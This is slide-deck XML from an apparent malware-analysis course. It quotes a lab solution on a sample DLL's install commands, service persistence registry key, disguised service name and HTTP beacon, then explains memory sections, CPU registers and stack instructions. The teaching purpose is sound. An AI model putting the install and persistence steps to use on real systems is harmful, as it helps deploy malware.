                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>rundll32.exe Lab03-02.dll,installA</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>.</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2. To run the malware, start the service it installs using the net command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>net start IPRIP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>.</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3. Use Process Explorer to determine which process is running the service.</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Since the malware will be running within one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>svchost.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>files on</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the system, hover over each one until you see the service name, or search</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for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab03-02.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>using the Find DLL feature of Process Explorer.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>486 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Appendix C</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4. In procmon you can filter on the PID you found using Process Explorer.</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5. By default, the malware installs as the service IPRIP with a display name of</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Intranet Network Awareness (INA+) and description of “Depends INA+, Collects</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and stores network configuration and location information, and</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notifies applications when this information changes.” It installs itself for</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persistence in the registry at HKLM\SYSTEM\CurrentControlSet\Services\IPRIP\</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Parameters\ServiceDll: %CurrentDirectory%\Lab03-02.dll. If you rename</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab03-02.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>to something else, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>malware.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, then it writes </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>malware.dll</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into the registry key, instead of using the name </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Lab03-02.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>.</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6. The malware resolves the domain name </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>practicalmalwareanalysis.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>and</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connects to that host over port 80 using what appears to be HTTP. It</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does a GET request for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>serve.html </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>and uses the User-Agent %ComputerName%</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Windows XP 6.11.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Google Shape;636;p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2" name="Google Shape;642;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4" name="Google Shape;654;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p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 name="Google Shape;667;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8" name="Google Shape;668;p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 name="Google Shape;693;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9" name="Google Shape;699;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7" name="Google Shape;707;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GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>This term can be used to refer to a specific section of memory called the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>data section</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which contains values that are put in place when a program is initially loaded. These values are sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>static </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>values because they may not change while the program is running, or they may be called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>global </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>values because they are available to any part of the program.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Code includes the instructions fetched by the CPU to execute the program’s tasks. The code controls what the program does and how the program’s tasks will be orchestrated.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>The heap is used for dynamic memory during program execution, to create (allocate) new values and eliminate (free) values that the program</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no longer needs. The heap is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>dynamic memory </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>because its contents can change frequently while the program is running.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>The stack is used for local variables and parameters for functions, and to help control program flow. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Google Shape;708;p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9" name="Google Shape;749;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7" name="Google Shape;757;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4" name="Google Shape;764;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1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>. General registers </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>are used by the CPU during execution (AX: accumulator; DX: double word accumulator; CX: counter; BX: base register; SI-DI: source-destination index).</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Segment registers </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>are used to track sections of memory.</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Status flags </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>are used to make decisions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Instruction pointers </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>are used to keep track of the next instruction to execute.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765" name="Google Shape;765;p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2" name="Google Shape;772;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8" name="Google Shape;808;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9" name="Google Shape;809;p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6" name="Google Shape;816;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4" name="Google Shape;824;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2" name="Google Shape;832;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0" name="Google Shape;840;p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p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8" name="Google Shape;848;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5" name="Google Shape;855;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Enter: setup a new stack frame for a procedure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Leave: used at the end of the procedure (just before the RET instruction) to release the stack frame (pop EBP off, set ESP = EBP).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ret: return the calling function (pop Return addr 🡪 EIP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Google Shape;856;p8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2" name="Google Shape;872;p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p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0" name="Google Shape;880;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9" name="Google Shape;889;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GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>argv stands for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ument </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ector</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GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>argc for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ument </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ount</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, and</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>envp for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ironment </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ointer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
